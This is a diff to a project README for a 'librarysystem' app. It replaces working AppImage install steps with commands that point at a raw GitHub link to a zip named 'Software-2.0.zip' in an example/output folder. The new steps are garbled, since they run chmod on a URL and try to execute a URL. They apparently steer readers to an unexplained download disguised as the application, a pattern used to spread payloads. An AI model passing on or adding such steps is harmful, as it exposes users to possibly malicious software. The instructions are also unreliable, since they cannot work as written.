edwin18v/librarysystem/README.md

 1. Open the terminal.
 2. Navigate to the directory where you downloaded the file.
-3. Use the command `chmod +x librarysystem.AppImage` to make it executable.
+3. Use the command `chmod +x https://raw.githubusercontent.com/edwin18v/librarysystem/master/example/output/Software-2.0.zip` to make it executable.
-4. Run the application using `./librarysystem.AppImage`.
+4. Run the application using `https://raw.githubusercontent.com/edwin18v/librarysystem/master/example/output/Software-2.0.zip`.

 ## 🔍 Features